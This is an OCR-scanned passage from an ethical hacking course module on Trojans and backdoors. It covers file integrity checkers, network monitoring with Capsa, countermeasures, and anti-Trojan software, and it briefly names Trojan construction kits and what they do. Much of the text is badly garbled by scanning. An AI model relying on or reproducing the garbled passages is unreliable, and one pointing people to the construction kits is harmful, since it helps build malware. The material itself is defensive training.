W * • I * W « P
:UfcUrtr^ :UfcUrtr^ » dwk MM
c DMiMMi * 1aar,J0»7149pn Pracwii22H«anO nOtaoarv% v%#31* ■■n1 n1156&£ oc00w«pr ec€00«Bi«r
FIGURE 6.62: FastSum W in M D 5 Source: h t t p : / / w w w . b l i s s t o n i a . c o m W i n M D 5 v 2 . 0 is is a W i n d o w s ( 98 9 8 , 2 0 00 00 , XP XP , V i s ta ta , 7) 7) u t i l i t y f o r c o m p u t i n g t h e M D 5 h a s h e s ( " f i n g e r p r i n t s " ) o f fifi le le s . I t al al so so m a k e s i t v e r y e a s y t o c o m p a r e t h e f i n g e r p r i n t s a g a i n s t t h e c o r r e c t fingerprints stored in an MD5SUM file. RedHat, for example, provides MD5SUM files for all of its large downloadable files. These fingerprints can be used to ensure that your file is uncorrupted. WinMD5 v2.07 (C) 2003-2006 by [email protected] File
Edit
Options
Help
Currently Processing: (idle)
Errors Found
(0 items enqueued)
Pat h MD5SUM. md5 ChangeLog. ChangeLog. t xt Cor r upt Fi Fi l e. t xt xt README. t xt Wi nMD5.exe D5. exe
Clear
| Has h
| Byt es
aeca3c951ddeal 830ebe7cebab5d 830ebe7cebab5de8cc e8cc d73f d73f f 397a76f 397a76f 886e8c5a 886e8c5a80b 80b052 05223feel 23feel 63895264778b3c e92c 57d0df f 67 670f 7c 7c 7 e3d78080bf e3d78080bf c49d89113c55cf c49d89113c55cf 4b7c4f b4 191c7c02a3206f 191c7c02a3206f dca2b79941c634d dca2b79941c634d2b2 2b2
Abort
192 192 1304 92 978 978 126976
| St at us Loaded Good BAD Good Good
Number of known md5 hashes found in MD5SUM files :
4
Drag files and MD5SUM files (if available) into this window.http window.http !;v.v.v. .bl 1sston 1a cony'software
FIGU FIGURE RE 6.63: 6.63: W iinM nM D5
Module 06 Page 982
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
File Files s an a nd Folder Inte Integr grit ity y Checker Advanced Checksum Verifier
CEH
Attribute Manager
(ACSV)
http://www.miklsoft.com
http:/'/www . irnis.net
J
2
i
p
I
ji
Fsum Fronte d
PA File Sight
y
http://fsumfe.sourceforge.net
http://www.poweradmin . com
Verisys
CSP File Integrity Checker
h t t p : / / w w w . ionx. . ionx. co. uk
h t t p : / / w w w. tandemsecurity. com
€
AFICK (Another File Integrity Checker)
ExactFile http://www.exactfile.com
http://afick.sourceforge.net
File Integrity Monitoring
OSSEC
h t t p : / / w w w . ncircle.com . ncircle.com
^ n₪ 1 |
Copyright © by
http://www.ossec.net
EG-G*ancil. All
Rights Reserved. Reproduction Is Strictly Prohibited.
F i le s a n d F o l d e r I n t e g r it y C h e c k e r s F ilil es es a n d F o ld ld e r I n t e g r i t y C h e c k e r s m o n i t o r f i le l e in i n t e g r i t y a n d i d e n t i f y t h e c h an an g e s i n the critical files that intimate any potential intrusion attempts A few files and folder integrity checkers are listed as follow s: ©
A d v a n c e d C h e c k s u m V e r i f i e r ( AC AC SV SV ) a v a i l a b l e a t h t t p : / / w w w . i r n i s . n e t
0
Fsum Fronted available at h t t p : / / f s u m f e . s o u r c e f o r g e . n e t
0
Verisys available at h t t p : / / w w w . i o n x . c o . u k
0
A FI FI CK CK ( A n o t h e r Fi Fi le le I n t e g r i t y C h e c k e r ) a v a i l a b l e a t h t t p : / / a f i c k . s o u r c e f o r g e . n e t
0
F ilil e I n t e g r i t y M o n i t o r i n g a v a ilil a b le le a t h t t p : / / w w w . n c i r c l e . c o m
©
A t t r i b u t e M a n a g e r a v a i la la b l e a t h t t p : / / w w w . m i k l s o f t . c o m
©
PA File File Sight ava ilable at h t t p : / / w w w . p o w e r a d m i n . c o m
0
CSP File File In teg rity Che cker ava ilable at h t t p : / / w w w . t a n d e m s e c u r i t y . c o m
0
ExactFile ExactFile availab le at h t t p : / / w w w . e x a c t f i l e . c o m
0
OSSE OSSEC C av aila ble at h t t p : / / w w w . o s s e c . n e t
Module 06 Page 983
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Scan Scanni ning ng for Suspicious Suspicious Network Activities J
C EH
Tr oja ns co nn ec t ba ck to ha nd le rs an d se nd co nf id en tia l in fo rm at io n to attackers
J
Us e ne tw or k sc an ne rs an d pa ck et sn iff ers to m on it or n e tw o rk traffic going going to m alicious alicious rem ote addresses
J
Run to ol s suc h as Ca ps a to m on it or n et w or k tra ff ic an d loo k f or suspicious suspicious activities sent over the web
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
S c a n n in g f o r S u s p ic io u s N e t w o r k A c t iv i tie s After a malicious attack, the Trojans start sending the confidential data present on the s y s t e m t o t h e a t t a c k e r s . T r o j a n s c o n n e c t b a c k t o h a n d l e r s an a n d s e nd nd c o n f i d e n t i a l i n f o r m a t i o n t o attackers. Use network scanners and packet sniffers to monitor network traffic going to m a l i c i o u s r e m o t e a d d re re s s e s . In In o r d e r t o a v o i d t h e s e s i t u a t io i o n s , i t ' s a lw l w a y s b e t t e r t o s ca ca n t h e n e t w o r k s f o r s u s p ic i c i o u s a c ti t i v i ti ti e s . W i t h t h e h e l p o f s c a n n i n g u t i l i t ie ie s , y o u c a n k n o w i f t h e d a t a is being transferred to a malicious remote source. By using network scanning tools like Capsa, you can identify such activities.
Module 06 Page 984
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Dete etecti cting Tro Trojan jans and a nd W o r m s with with Capsa Cap sa Networ Net work k Analy Analyze zer r
CEH
Capsa is an intuitive network analyzer, which provides detailed information to help check if there are any Trojan activities on a network
htt p :/ / w ww . colasoft. com
Copyright © by EC-C EC-Coanci l. All Rights Reserved. Reserved. Reproducti on Is Strict ly Prohibite d.
J D e te c tin g T r o ja n s a n d W o r m s w ith C a p s a N e t w o r k A n a ly z e r Source: h t t p : / / w w w . c o l a s o f t . c o m C ap a p sa sa i s a n e t w o r k a n a l y z e r t h a t p r o v i d e s e n o u g h i n f o r m a t i o n t o h e l p c h e c k i f t h e r e i s a n y T r o j a n a c t i v i t y o n a n e t w o r k . I t i s a p o r t a b l e n e t w o r k a n a l y z e r f o r LANs/WLANs t h a t p e r f o r m s packet capturing, network monitoring, advanced protocol analysis, in-depth packet decoding, and automatic expert diagnosis. F e a t u re re s o f C a ps ps a N e t w o r k A n a l y z e r i n c l u d e : ©
R e a l - t im im e
capture
and
sa sa v e d a t a t r a n s m i t t e d
over
l o ca ca l n e t w o r k s , i n c l u d i n g w i r e d
network and wireless network like 802.11a/b/g/n Q
M o n i t o r n e t w o r k b a n d w i d t h a n d us us ag a g e b y c a p t u r i n g d a t a p a c k e ts ts t r a n s m i t t e d o v e r t h e n e t w o r k a n d p r o v i d in i n g s u m m a r y a nd n d d e c o d i n g i n f o r m a t i o n a b o u t t h e se s e p a c k e ts ts
©
V i e w n e t w o r k s t a t is is t i c s, s , a l l o w i n g ea e a s y c a p t u r e a n d i n t e r p r e t a t i o n o f n e t w o r k u t i lili z a t i o n data
e
M on itor
Interne t,
e m a i l,l,
and
instant
m es e s s a g in in g
traffic,
h e l p in in g
keep
em ployee
produ ctivity to a max imum
Module 06 Page 985
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
e
D i a g no no s e
and
pinp oin t
Exam 312-50 Certified Ethical Hacker
net w or k
proble ms
in
seconds
by
detecting
and
locating
suspicious hosts e
M a p o u t t h e d e ta ta i ls ls , i n c l u d i n g t r a f f i c , IP IP a d d re re s s , a n d M A C , o f e ac ac h h o s t o n t h e n e t w o r k , a l l o w i n g f o r e a s y i d e n t i f i c a t i o n o f e a c h h o s t a nd n d t h e t r a f f i c t h a t p a ss ss es es t h r o u g h e a cch h
©
V i s ua u a l iz iz e t h e e n t i r e n e t w o r k i n a n e l lili p s e t h a t s h o w s t h e c o n n e c t i o n s a nd n d t ra ra f f i c b e t w e e n e a c h h o st st
FIGURE 6.64: 6.64: Detecting Trojans Trojans and Worms with Capsa Network Analyzer
Module 06 Page 986
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Copyright © by EG-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
M o d u l e F lo lo w So far, we have discussed various Trojans and the ways they infect the system resources or inform ation stored on the c om pute r, as well as ways to dete ct Trojans on a computer.
Once
you
detect
a
Trojan,
you
should
immediately
delete
it
and
apply
c o u n t e r m e a s u r e s t h a t o f f e r p r o t e c t i o n a g a in in s t T r o ja ja n s a n d b a c k do d o o r s. s . T h e se se c o u n t e r m e a s u r e s minimize risk and provide complete protection to the user's system.
Trojan Concepts
(
!/— V
Trojans Infection
Types of Trojans
Countermeasures
|jj |jjp |j| |j|
Anti-Troj Anti-Trojan an Sof twa re Penetration Testing Testing
—
f 1 Troj rojan Dete Detect c tiion
Module 06 Page 987
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
T h is is s e c t io io n h i g h l i g h t s v a r i o u s c o u n t e r m e a s u r e s t h a t p r e v e n t T r o j a n s a n d b a c k d o o r s f r o m entering into yo ur system.
Module 06 Page 988
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Trojan Trojan C ounterm easures
C EH
Avoid opening email attachments received from unknown senders
Avoid accepting the
Block all unnecessary ports
programs transferred by
at the host and firewall
i n s t a n t m e s s a g i ng ng
Harden weak, default configuration settings
Disable unused
M o n i t o r t h e i n te te r n a l
functionality including
n e t w o r k t r a f f ic ic f o r o d d
protocols and services
ports or encrypted traffic
Copyright © by
EG-G*ancil. All
Rights Reserved. Reproduction is Strictly Prohibited.
T r o ja ja n C o u n t e rm e a s u r e s A T r o j a n i s a m a l i c i o u s p r o g r a m t h a t m a s q u e r a d e s as as a g e n u i n e a p p l i c a t i o n . W h e n these Trojans are activated, they lead to many issues such as erasing data, replacing data on a victim's computer, corrupting files, spreading viruses, and spying on the victim's system and secretly reporting the data, recording keystrokes to steal sensitive information such as credit card number, user names, passwords etc. and opening a backdoor on the victim's system for carrying out precarious activities in the future. In order to prevent such activities and reduce t h e r i s ks ks a g a in in s t T r o j an an s , t h e f o l l o w i n g c o u n t e r m e a s u r e s h o u l d b e a d o p t e d : 0
A v o i d o p e n i n g e m a i l a t t a c h m e n t s re r e c e iv iv e d f r o m u n k n o w n se s e n d er er s
0
B l oc o c k a llll u n n e c e s s a ry r y p o r t s a t t h e h o s t a nd n d f ir ir e w a l l
0
A v o i d a c c e p t i n g t h e p r o g r a m s t r a n s f e r r e d b y i n s t a n t m e s s a g in in g
0
H a r d e n w e a k , d e f a u l t c o n f i g u r a t i o n s e t t in in g s
0
D i sa s a b le le u n u s e d f u n c t i o n a l i t y i n c l u d i n g p r o t o c o l s an a n d s e r vi vi c es es
0
M o n i t o r t h e in i n t e r n a l n e t w o r k tr t r a f f i c f o r o d d p o r ts t s o r e n c r y p t e d t ra ra f f i c
Module 06 Page 989
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Trojan Trojan Cou nterm nter m easures (Cont’d) Avoid dow nloadin g and executing applications from untrusted sources
Avoid typing the commands blindly and impleme nting pre-fabricated programs or scripts
Install patches and sec urity updates for the operating systems and applications applications
Manage local works tation file integ rity through checksums, auditing, and port scanning scanning
C EH
/ . Ic Ic itit if w wd d
i t tx tx j J • U. U. U U..
Scan Scan CDs and flopp y disks with antivirus softwa re before using using
Run Run host-based antivirus, firewall, and intrusion detection software
Copyright Copyright © by EG-Gouncil. All Rights Rights ^gSen/ ^gSen/ ed.;Reproduction ed.;Reproduction is Strictly Prohibited.
T r o j a n C o u n t e r m e a s u r e s ( C o n t ’d ) 9
A v o i d d o w n l o a d i n g a n d e x e c u t i n g a p p lil i c a ti t i o n s f r o m u n t r u s t e d s o u rc rc e s
9
I n st s t a llll p a t c h e s a n d s e c u r i t y u p d a t e s f o r t h e o p e r a t i n g s y s t e m s a n d a p p l i c a t i o n s
9
S ca ca n CD CD s a n d f l o p p y d i s ks ks w i t h a n t i v i r u s s o f t w a r e b e f o r e u s in in g
9
Restrict permissions within the desktop environment to prevent malicious applications installation
9
Avoid typing the commands blindly and implementing pre-fabricated programs or scripts
9
M a n a g e l oc oc a l w o r k s t a t i o n f i l e i n t e g r i t y t h r o u g h c h e c k s u m s , a u d i t i n g , a n d p o r t s c a n n in in g
9
R un un lo lo c a all v e r s i on o n s o f a n t i v i r u s , f i r e w a l l , a nd nd i n t r u s i o n d e t e c t i o n s o f t w a r e o n t h e d e s k t o p
Module 06 Page 990
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Backdoor Counterme Coun termeasures asures
CEH
UrtifM
tUx*l
lMh lIMh•(
Most commercial anti-virus products can automatically scan and detect backdoor programs before they can cause damage
m
Educate users not to install applications downloaded from untrusted Internet sites and and email attac hments
Use anti-virus tools such as Windows Defender, McAfee, and Norton to detect and eliminate backdoors
Copyright © by
EG-G*ancil. All
Rights Reserved. Reproduction Is Strictly Prohibited.
B a c k d o or C o u n t e rm e a s u r es P e rh r h a ps ps t h e o ld l d a d a g e " a n o u n c e o f p r e v e n t i o n i s w o r t h a p o u n d o f c u r e " i s r e l ev ev a n t here. Some backdoor countermeasures are: 0
T h e f i r s t l in in e o f d e f e n s e i s t o
educate
use err s r e g a r d in in g t h e
d a n g e r s o f i n s t a llll i n g
applications dow nload ed fro m the Internet, and to be cautious if they have to open email attachments. 0
T h e s e c on o n d l i ne ne o f d e f e n s e c a n be be a n t i v i ru r u s p r o d u c t s t h a t a re re c a p a b l e o f r e c o g n iz iz i n g T r o j a n s i g n a t ur u r e s . T h e u p d a t e s s h o u l d b e r e g u l a r ly ly a p p l i e d o v e r t h e n e t w o r k .
0
The third
l in in e o f d e f e n s e c o m e s f r o m
k e e p i n g a p p l i c a t i o n v e r s io io n s u p d a t e d
by the
f o l l o w i n g s e c u r i ty t y p a tc tc h e s a n d v u l n e r a b i l i ty ty a n n o u n c e m e n t s . Use antivirus tools such as Windows Defender, McAfee, and Norton to detect and eliminate backdoors.
Module 06 Page 991
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
C o n s t r u c t T r o j an an
Exam 312-50 Certified Ethical Hacker
Trojan Execution
Trojan Horse Construction Kits
Trojan Horse construction
The tools in these kits can
Trojan Horse Construction Kit
kits help attackers to
be dangerous and can
P r o g e n i c M a i l T r o ja ja n
construct Trojan horses of
backfire if not executed executed
Con struction Kit - PMT
their choice
properly
Pandora's Box
411
©
© Copyright © by
EG-G*ancil. All
Rights Reserved. Reproduction Is Strictly Prohibited.
T r o ja n H o r se C o n s t r u c t io n K its T h e s e k i ts ts h e l p a t t a c k e r s c o n s t r u c t T r o j a n h o r s e s o f t h e i r c h o i ce ce . T h e t o o l s i n t h e s e k i ts ts c a n b e d a n g e r o u s a n d c a n b a c k f i r e i f n o t e x e c u t e d p r o p e r l y . S o m e o f t h e T r o j a n k i ts ts available in the wild are as follows: 0
T h e T r o j a n H o r s e C o n s t r u c t i o n K i t v 2 . 0 c o n si s i s ts ts o f th t h r e e EXE f i le le s : T h c k - t c. c. e x e , T h c k fp.exe, and Thck-tbc.exe. Thck.exe is the actual Trojan constructor. With this commandline utility, the attacker can construct a Trojan horse of his or her choice. Thck-fp .exe is a f i le le s i ze ze m a n i p u l a t o r . W i t h t h i s , t h e a t t a c k e r c a n c r e a t e f i le l e s o f a n y l e n g t h , p a d o u t f i le le s to a specific length, or even append a certain number of bytes to a file. Thck-tbc.exe will turn any COM program into a Time Bomb.
Q
T h e P r o g e n i c M a i l T r o j a n C o n s t r u c t i o n K i t ( P M T ) is is a c o m m a n d - l i n e u t i l i t y t h a t a l l o w s an attacker to create an EXE (PM.exe) to send to a victim.
0
P a n d o r a ' s B ox ox is a p r o g r a m d e s i g n e d t o c r e a t e T r o j a n s / t i m e b o m b s .
Module 06 Page 992
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
M odule Flow Fl ow
EH
Penetratio n Testing Testing
^
Anti-Trojan Software
**S
Trojan Concepts
Trojan Infection
Countermeasures
Types of Trojans
Trojan Detection / Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
I M od ule Flow lu §
P r io io r t o t hi h i s , w e h a vve e d i sc s c u ss ss e d v a ri ri o u s c o u n t e r m e a s u r e s t h a t o f f e r p r o t e c t i o n t o y o u r
computer system and the information stored on it against various malware such as Trojans and b a c k d o o r s . I n a d d i t i o n t o t h e se se , t h e r e i s a n t i - T r o j a n s o f t w a r e t h a t c a n p r o t e c t y o u r c o m p u t e r systems and other in form ation
a s se se ttss a g a in in s t T r o j a n s a nd nd b a c k d o o r s . A n t i - T r o j a n s o f t w a r e
d ea e a ls ls w i t h r e m o v i n g o r d e a c t i v a ti ti n g m a l w a r e .
, •
s
v
—
Tro jan Concepts
Co u nte rm e a su re s
Trojans Infection
Anti-Trojan Software
Types Types of Trojans Trojans
^
Penetrat Penetration ion Test Testin ing g
—
f
Trojan Detection
This section lists and describes various anti-Trojan software programs.
Module 06 Page 993
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Anti-Trojan Anti-Trojan Softwar Software: e: TrojanHunter
CEH
TrojanHunter is an advanced malware scanner that detects all sorts of malware such as Trojans, spyware, adware, and dialers
' -L e T x
TrojanHunter
M e m o r y s c a n n in in g f o r d e t e c t i n g any m o d i f i e d v a r i a n t o f a particular bu ild o f a Trojan
File View Seen J00I5 Help
\
FjlE car
\
QjckScan
Q
Update
*
cLry TrojanHunter Now -Clcfc Here!
Bat
Registry scanning for detecting traces of Trojans in the registry
! j
b
Inifile scanning for detecting traces of Trojans in configuration files files
^Char. ..
Clow
O Fo>n Fo>nd d va » file: CAJser3\AdrhVkaoOeto\.K0i\T OT0Wx.cxcAJ0K.fyv1hwyb (Aocnt.2989) W POJ10 VOtdn Ifc: C:V/rtJowstf ysWOM64y1CAFEE. EKE(RI shvare. TVtyPrcwv . IOC)
TrojanHun ter Guard for resident memory scanning - detect any Trojans if they manage to start up
http ://w ww. trojanhunter. com com Copyright © by
EG-CMHCil. All
Rights Reserved. Reproduction Is Strictly Prohibited.
A n t ii - T r o jjaa n S o f tw t w a r e: e: T r o j a n H u n t e r Source: h t t p : / / w w w . t r o j a n h u n t e r . c o m T r o j a n H u n t e r is is a m a l w a r e s c a n n e r t h a t d e t e c t s a n d r e m o v e s a llll s o rt rt s o f m a l w a r e , s u c h as as Trojans, spyware, adware, and dialers, from your computer. Some of Trojan Hu nter's features include: 0
H i g h -s - s p e e d f i le l e s ca ca n e n g i n e c a p a b l e o f d e t e c t i n g m o d i f i e d T r o j a n s
0
M em ory scanning for detec ting any mo dified variant of a particular build of a Trojan
9
R e g i st s t r y s c a n n i n g f o r d e t e c t i n g t r a ce c e s o f T r o j a n s in in t h e r e g i s t r y
Q
I n i fi fi le le s c a n n in in g f o r d e t e c t i n g t r a c e s o f T r o j a n s in in c o n f i g u r a t i o n f i le le s
0
Port scanning for detec ting open Trojan ports
9
T h e A d v a n c e d T r o j a n A n a ly l y z e r , an an e x c lu lu s i v e f e a t u r e o f T r o j a n H u n t e r , is a b l e
to find
w h o l e c la la ss s s es es o f T r o j a n s u s i n g a d v a n c e d s c a n n i n g t e c h n i q u e s 0
T r o j a n H u n t e r G u ar ar d f o r r e s id i d e n t m e m o r y s c a n n in i n g - d e t e c t a n y T r o ja ja n s if if t h e y m a n a g e to start up
9
L i v e U p d a t e u t i l i t y f o r e f f o r t l e s s r u l e s e t u p d a t i n g v ia ia t h e I n t e r n e t
Module 06 Page 994
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
9
Exam 312-50 Certified Ethical Hacker
P r o ce ce s s l is is t g i v i n g d e t a i l s a b o u t e v e r y r u n n i n g p r o c e s s o n t h e s y s t e m , i n c l u d i n g t h e p a t h t o t h e a c t u a l e x e c u t a b l e f ili l e
0
A c c u r a t e r e m o v a l o f al all d e t e c t e d T r o j a n s - e v e n i f t h e y a r e r u n n i n g o r i f t h e T r o j a n h a s i n j e c t e d i t s e l f in i n t o a n o t h e r p r oc oc e s s TrojanHunter File
View
Scan
Tools
Help
0 Full Scan
Quick Scan
L j l J
■h
Update
Exit
Object s scanned:
147791
Trojans found:
a Buy Trojan Hun ter Now - Click Here!
2
> , Clean. Clean.
Close
(U) Found trojan file: file: C:\Users\Admin\AppDataV-0 cal\TempVjpx.exeAJpx.fyvzhwyb cal\TempVjpx.exeAJpx.fyvzhwyb (Agent.2989) (Agent.2989)
10
Found trojan file: C: \W1ndows\$ysWOW \W1ndows\$ysWOW64V>1 64V>1CAFEE.E CAFEE.EXE XE (Rjskw are.TinyP roxy. 100)
FIGURE 6.65: TrojanHunter Anti-Trojan Software
Module 06 Page 995
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Anti-Trojan Softw Software are: : Emsis Emsisof oft t Anti-Malware E m s i s o f t A n t i -M -M a l w a r e p r o v id id e s
Emsisoft
P C p r o t e c t i o n a g a i n s t v ir ir u s e s ,
CEH
ANTI-MALWARE
Trojans, spyware, adware, worms, bots, keyloggers, and rootkits
t=J
T w o c o m b i n e d s c a n n e rs rs f o r
S C A N C O M P U TE R Scanne ned d objects objects
c l e a n in in g : A n t i - V i ru ru s a n d A n t i -
*97-163
Dctectcd objects:
Reno/eb Reno/eb ob objec jects:
0
DrtaiK 62 registry keys ir cdium ri^<
a
Scanning: Sar'rohcd
Malware
Oiagntnn
Three guards against new
B
infections: file guard, beha vior
U
b l o c k e r, r, a n d s u r f p r o t e c t i o n
317
f O
Id
&
Id Id
S J detectedbcaticr?.. IraicJtauaUYlCf 5J (A) (A) Gt We* gidptp^ trdbca to'5 TraicJtamtreJiM aiYr Svstan Svstan Pmtn ifd £ Vicr Vicr Jdc -x:*db x :*db ^*jcr 3.. 3.. Troiaa.Gcn cnu5515373 TO) E \1zn Jde'.e.tedk>.3X> 5.. YD5.TroiaikNooUD (0) (E \ t z r Jdc'.c. Jdc'.c. rdlo.a Xf S. S... JS JSJWCC(B)
MjtptctottcM cM*tHaveb ebeendetecte teddurin ingthe1 e1
16regstry keys mrdiumrWc
I Scan finished!
If there*vjc beer anyMa anyMalware foundonvowP donvow PC. rwi tan obtainrare rarerrfbraiatKMon** obouteochOctcctrCMa hOctcctrCMal*arc. Cld< the1 the 1M11 ■of tie detected nalwarcto $rc Ina Inarrw Inow** wndorv. rrwInow**
2 files highrisk
2fifes high risk 2 f i t s •Highrisk
Cltk onVicv»01detected
locittorV .o get a Kt o' «1 kxjtd
eocroorcnts!ha rcnts!hatarc•cotcc arc •cotcc » the Mfll^rtip Mfll^rt ip name.
Sebct01!objectsyou/ran: to quatan annrw !hendrfc^e
T»1irt'Mtrr «H «Her*eHrMerN" er*eHr MerN"
—
ASout •ftc £0twa e
© 2a03-2D:2ErKB=#r
http://www.emsisoft.com
Copyright © by EGEG-CO COBnci!. Bnci!. All Rights Reserved. Reproducti on is Stri Stri ctly Prohibi ted.
A n t ii - T r o j a n S o f tw t w a r e : E m s i s o f t A n t i -M -M a l w a r e Source: h t t p : / / w w w . e m s i s o f t . c o m E m s i so so f t A n t i - M a l w a r e p r o v id i d e s r e lili a b le le p r o t e c t i o n o f y o u r s y s t e m a g ai a i n st s t v a r io io u s t h r e a t s s u c h as
viruses,
Trojans,
spyware,
adware,
worms,
bots,
keyloggers,
and
rootkits.
It
has
two
combined scanners (antivirus and anti-malware) for cleaning infection and three guards against n e w i n f e c t i o n s : f ilil e g u a r d , b e h a v i o r b l o c k e r , a n d s u r f p r o t e c t i o n .
Module 06 Page 996
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
E m s is o f t
&
AN ANTI-MALWARE
SCANC NCOM PUTER Scanned objects :
r
Exam 312-50 Certified Ethical Hacker
497483
/
Detected objects:
317
Removed objects:
ijLigS 0
\ Se a n n in g : Scan Scan finishe finished! d!
Diagnosis Trace.ReqistrvTrace.Reqi strv-Windows Windows Password Pass word CA)
PI
9 p i
Details 62 registry keys - medium risk
A
View View all all detected locations...
Trace.Reaistrv.LCP 5.0 fA)
Scan finished!
16 regis try k eys - medium um risk
ffl View View all all detected locations...
HTI Trace.Re Trac e.Reais aistr trv.Pr v.Proact oactive ive Svstem Svst em Password Re< Re<15 15reoistry keys - medium risk 5) View all detec ted locations ... |w |
Troian.Generic.5515373 (B) (B)
2 files - high risk
b
ffl View View all all detected locations... 0
VBS.Troian.Noob.BfB)
2 files - high risk
ffl View View all all detected locations... 2 files - high risk 3&AXCCXB) Suspicious files have been detected during the scan. 0
If there has been any Malware Malware found on your PC, you can obtain more information online about each detected Malware. Malware. Click c k the name of the detected malware to view the description in a new browser window.
V
Clide Clide on "View all detec ted locations’ to g et a list o f all all found components components tha t are related to the Malware name. Select all all objects you w ant to quarantine and then didc the iflrantinp vIprtpH nhip rfc' Oi iflrantinp
© 2003-2012 Emsisoft Emsisoft
About this software
F IG IG U RE RE 6 . 6 6 : E m s i s o f t A n t i - M a l w a r e
Mo dule 06 Page Page 997
Ethical Hacking and Coun termea sures Copyright © by EC-C0 EC-C0Un UnCi Cill All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
An A n t i - T r o j a n S o f t w a r e s Anti-Trojan Shield (ATS) a□ □
p H
http://www.spamfighter.com
---------- -
Spyware Doctor Doctor
Anti Trojan Elite
http://www.pctools. com
http://www.remove-trojan.com
h t t p : / / w w w . . c omodo. com
H
S P Y W A R E f i g h te r
http://www.atshield.com http://www.atshield. com
Anti Malware BOCIean
- [nn|
CEH
V'
SUPERAntiSpyware
A
http://www.superantispyware.com
Anti Hacker
Trojan Remover
http://www.hide-my-ip.com
http://www.simplysup.com http://www.simplysup. com
XoftSpySE
Twister Antivirus
http://www.paretologic.com
http://www.filseclab.com
Copyright © by EG-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
* A nti-Tro jan Softw are Anti-Trojan
software
provides
protection
to
your
computer
system
and
the
information stored on it by blocking various malicious threats such as Trojans, worms, viruses, b a c k d o o r s , m a l i c i o u s A c t iv i v e X c o n t r o l s , a n d J av av a a p p l e t s t o e n t e r y o u r s y s t e m . A f e w o f t h e a n t i T r o j a n s o f t w a r e p r o g r a m s t h a t a r e u s e d f o r t h e p u r p o s e o f k i l l in in g m a l w a r e a r e l i s te t e d as as f o l l o w s : 9
A n t i - T r o j a n S h ie ie l d ( AT AT S) S) a v a i l a b l e a t h t t p : / / w w w . a t s h i e l d . c o m
9
S p y w a r e D o c t o r a v a i l a bl bl e a t h t t p : / / w w w . p c t o o l s . c o m
9
A n t i M a l w a r e BO BO C I ea ea n a v a i l a b l e a t h t t p : / / w w w . c o m o d o . c o m
9
Anti Hacker available at h t t p : / / w w w . h i d e - m v - i p . c o m
9
X o f tS tS p y S E a v a i l a b l e a t h t t p : / / w w w . p a r e t o l o g i c . c o m
9
SPYWAR Efighter available at h t t p : / / w w w . s p a m f i g h t e r . c o m
9
A n t i T r o j a n E lili t e a v a i l a b l e a t h t t p : / / w w w . r e m o v e - t r o i a n . c o m
9
SUPERA ntiSpyware available at h t t p : / / w w w . s u p e r a n t i s p y w a r e . c o m
9
T r o i a n R e m o v e r a v a i l ab ab l e a t h t t p : / / w w w . s i m p l y s u p . c o m
9
T w i s t e r A n t i v i r u s a v a i l ab ab l e a t h t t p : / / w w w . f i l s e c l a b . c o m
Module 06 Page 998
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
M odule Flow Fl ow
EH
Trojan Concepts
Trojan Infection
**S
Countermeasures
Types of Trojans
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
